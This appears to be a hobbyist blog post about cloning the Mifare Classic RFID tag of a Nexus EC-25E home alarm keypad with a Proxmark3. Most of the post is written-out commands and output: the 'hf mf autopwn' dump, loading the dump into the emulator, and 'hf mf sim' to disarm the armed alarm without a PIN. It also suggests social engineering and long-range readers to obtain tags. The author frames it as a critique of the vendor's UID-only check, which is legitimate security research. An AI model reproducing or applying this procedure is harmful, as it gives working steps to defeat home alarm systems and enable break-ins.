Bought an alarmsystem a while ago, and thought I would play with it a bit, to see how bad it actually is. Let's say, so far, I'm not impressed.
If you want to try this out for yourself, you would need the alarmsystem, and a Proxmark3, if you got that covered, dig in for some alarmsystem fun :)
Okay, first what system is it ?
It's a Nexus EC-25E, like this one here https://www.nexuscctv.dk/wifi-3g-alarmstyreenhed.html. Just for laughs, I got a couple of wireless remotes and a wireless keypad with RFID to go with it, just to have something to play with. So far, I've played around with the RFID tags, and here's the results.
Fire up a PM3, and let's start the hunt.
hf search
🕓 Searching for LTO-CM tag...
[!] ⚠️ No known/supported 13.56 MHz tags found
[usb] pm3 --> hf search
🕚 Searching for LTO-CM tag...
🕐 Searching for ISO14443-A tag...
[+] UID: 5F F8 3C 3D
[+] ATQA: 00 04
[+] SAK: 08 [2]
[+] Possible types:
[+] MIFARE Classic 1K
[=] proprietary non iso14443-4 card found, RATS not supported
[+] Magic capabilities : Gen 1a
[#] 1 static nonce 01200145
[+] Static nonce: yes
[#] Auth error
So we got a card / tag. It looks like it's a Mifare Classic 1K tag. Okay. Now, I'm lazy, so why don't we try this
hf mf autopwnIf that worked, you should now have a emulator dump file, ending in eml. Now, let's see if we can simulate the tag back to the alarmsystem, using the Proxmark3. We do that by loading the dump into the simulator, and verifying that it's there. First we load it.
hf mf eload -f hf-mf-5FFXXX-dump.emlLet's see if we got it in the simulator
pm3 --> hf mf eview
[=] downloading emulator memory
[=] ----+-------------------------------------------------+-----------------
[=] blk | data | ascii
[=] ----+-------------------------------------------------+-----------------
[=] 0 | 5F F8 3C 3D A6 08 04 00 01 6F 01 6D 45 68 F8 1D | _.<=.....o.mEh..
[=] 1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=] 2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=] 3 | FF FF FF FF FF FF 08 77 8F 00 FF FF FF FF FF FF | .......w........
[=] 4 | 68 61 6E 64 6C 65 00 00 00 00 00 00 00 00 00 00 | handle..........
[=] 5 | 4E 6F 45 78 65 63 75 74 65 00 00 00 00 00 00 00 | NoExecute.......
[=] 6 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
So, this requires a little bit of explaining I guess.
If you look at the ascii, it says "handle" and "NoExecute". That's because this is a test tag, to play around with electronic dog tags and smartphones. But since the Nexus is just using, or maybe using only the UID, it doesn't matter.
Notice block 0, we got an UID. So let's try and run the simulator with the content that's loaded. But, before we do that, arm the alarmsystem, and check with the app that it really is armed.
Now, to run the simulator with the content from the dumpfile, we need this command.
hf mf sim --1k
[=] MIFARE 1K | UID N/A
[=] Options [ numreads: 0, flags: 272 (0x110) ]
[#] Enforcing Mifare 1K ATQA/SAK
[#] 4B UID: 5ff83c3d
[#] ATQA : 00 04
[#] SAK : 08
[usb] pm3 --> hf mf sim --1k --interactive
You can run it with "hf mf sim --1k", but I like to run it in interactive mode, so the promt keeps running until I break it, either works out fine, so try them both. Now, present the Proxmark to the wireless keypad for the alarm system, and if things worked out, it should switch to disarmed mode, and the app should say so.
So, did we learn anything ? Yep, don't leave your tags unattended, and don't let friends / strangers borrow them, not even for five seconds without you watching their every move :)
As far as RFID goes, this system simply isn't good enough, since it just checks the UID and nothing else. And what's worse. When you use the keypad normally, you would have to press "disarm + pincode + #", to shut off the alarm. That's not true when using the tag. Simply just present the tag to the keypad, and it shuts off the alarm, no pincode needed.
I know what you're gonna say, that it requires the thief to get hold of a tag and copy it. You're right, it does. But with some knowledge, some social engineering, and a long range reader, that should be possible. All of this would be IMPOSSIBLE if the vendor required the system to check for other parameters in the tag itself, and not just rely on the UID alone, and use good encryption on the tag itself.
I know, my bad. It is after all only a 300 USD system, so what did I expect ? :)
As Always, Much Happy Hacking